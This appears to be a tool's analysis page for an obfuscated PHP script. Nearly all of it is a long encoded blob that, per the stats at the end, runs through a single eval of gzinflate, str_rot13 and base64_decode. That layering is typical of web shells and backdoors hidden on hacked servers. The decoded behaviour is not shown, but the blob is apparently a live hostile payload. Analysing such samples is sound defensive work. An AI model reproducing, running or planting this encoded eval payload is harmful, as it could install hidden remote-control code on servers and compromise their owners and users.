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")))); ?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 77d2650f9a1aa423d460d1219967b7ab
Eval Count 1
Decode Time 106 ms